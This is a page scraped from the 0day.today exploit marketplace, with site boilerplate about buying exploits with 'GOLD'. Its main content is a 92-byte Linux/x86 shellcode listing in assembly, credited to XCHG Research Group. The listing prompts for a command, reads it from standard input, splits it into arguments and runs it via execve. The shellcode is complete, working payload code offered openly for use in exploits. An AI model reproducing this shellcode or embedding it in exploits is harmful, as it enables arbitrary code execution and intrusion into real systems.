0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/x86 execve read shellcode - 92 bytes
========================================== linux/x86 execve read shellcode - 92 bytes ========================================== # XCHG Research Group # Linux/x86 execve read shellcode - 92 bytes .text .globl _start _start: # EAX = 0x04 -> syscall write() xorl %eax, %eax movb $0x4, %al xorl %ebx, %ebx inc %ebx pushl $0x20202020 pushl $0x3a646e61 pushl $0x6d6d6f43 movl %esp, %ecx xorl %edx, %edx movb $0x9, %dl int $0x80 # EAX = 0x03 -> syscall read() xorl %eax, %eax movb $0x3, %al xorl %ebx, %ebx xorl %edx, %edx movb $0x20, %dl subl %edx, %esp movl %esp, %ecx int $0x80 # buffer[read(0, buffer, sizeof(buffer))] = 0; addl %eax, %ecx dec %ecx movl %ebx, (%ecx) movl %esp, %ebx addl %eax, %ebx movl %eax, %ecx xorl %edx, %edx push %edx LOOP1: movb (%ebx), %al cmp $0x20, %al jne CONT xorb $0x20, (%ebx) inc %ebx pushl %ebx dec %ebx CONT: dec %ebx loop LOOP1 push %ebx movl %esp, %ecx xorl %eax, %eax movb $0xb, %al int $0x80 # EAX = 0x01 -> syscall exit xorl %eax, %eax inc %al xorl %ebx, %ebx int $0x80 # 0day.today [2024-12-25] #